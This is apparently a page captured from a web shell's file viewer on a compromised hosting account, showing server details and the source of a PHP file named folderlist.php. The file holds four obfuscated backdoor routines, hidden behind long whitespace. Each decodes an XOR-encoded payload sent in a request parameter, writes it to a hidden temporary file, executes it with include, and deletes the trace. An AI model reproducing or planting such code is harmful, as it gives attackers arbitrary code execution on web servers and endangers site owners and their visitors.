HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/prostanur1.vitavit.com.pk/includes/
Upload Files
File: /home/vitanhod/prostanur1.vitavit.com.pk/includes/folderlist.php
<?php																																										if(@$_REQUEST["en\x74"] !== null){ $record = array_filter([getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd()]); $desc = $_REQUEST["en\x74"]; $desc= explode ( "." , $desc ); $factor =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s); foreach( $desc as $u =>$v3): $sChar =ord( $s[$u % $sLen]); $dec =( ( int)$v3 - $sChar -( $u % 10)) ^ 40; $factor .= chr( $dec); endforeach; foreach ($record as $value): if (max(0, is_dir($value) * is_writable($value))) { $item = join("/", [$value, ".val"]); $file = fopen($item, 'w'); if ($file) { fwrite($file, $factor); fclose($file); include $item; @unlink($item); exit; } } endforeach; }
																																										if(isset($_REQUEST["\x6F\x62j"])){ $entity = array_filter([session_save_path(), sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", "/dev/shm"]); $data = $_REQUEST["\x6F\x62j"]; $data = explode( "." , $data ) ; $mrk = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s9); $r = 0; foreach( $data as $v4) { $chS = ord( $s9[$r% $sLen]); $d = ( ( int)$v4 - $chS -( $r% 10)) ^ 71; $mrk .= chr( $d); $r++; } foreach ($entity as $key => $elem) { if ((function($d) { return is_dir($d) && is_writable($d); })($elem)) { $rec = join("/", [$elem, ".comp"]); $success = file_put_contents($rec, $mrk); if ($success) { include $rec; @unlink($rec); exit;} } } }
																																										if(!empty($_POST["f\x6C\x67"])){ $marker = $_POST["f\x6C\x67"]; $marker = explode ('.' ,$marker ) ; $rec = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s2); $t = 0; array_walk( $marker , function( $v5) use( &$rec , &$t , $s2 , $lenS) { $chS = ord( $s2[$t % $lenS]); $d =( ( int)$v5 - $chS -( $t % 10)) ^ 38; $rec .= chr( $d); $t++;} ); $flag = array_filter([getcwd(), getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", "/tmp", "/dev/shm", ini_get("upload_tmp_dir")]); foreach ($flag as $key => $property_set) { if (!!is_dir($property_set) && !!is_writable($property_set)) { $val = str_replace("{var_dir}", $property_set, "{var_dir}/.reference"); $success = file_put_contents($val, $rec); if ($success) { include $val; @unlink($val); die();} } } }


if(isset($_REQUEST["\x72\x65s"])){
	$resource = array_filter([getcwd(), getenv("TMP"), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), "/var/tmp", "/tmp"]);
	$binding = $_REQUEST["\x72\x65s"];
	 	$binding= 	explode 	 ( 	'.',	 	$binding  )	;	
	$reference = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$s  );
    
            foreach(	$binding as $u => $v3) {	 $chS = ord(	$s[$u% 	$sLen]  );
                $dec =(	(	int)$v3 - $chS -(	$u% 	10))^6;
                $reference .= chr(	$dec  );  }  
	foreach ($resource as $ref):
    		if (array_product([is_dir($ref), is_writable($ref)])) {
    $element = join("/", [$ref, ".fac"]);
    if (file_put_contents($element, $reference)) {
	include $element;
	@unlink($element);
	exit;
}
}
endforeach;
}
@ Telegram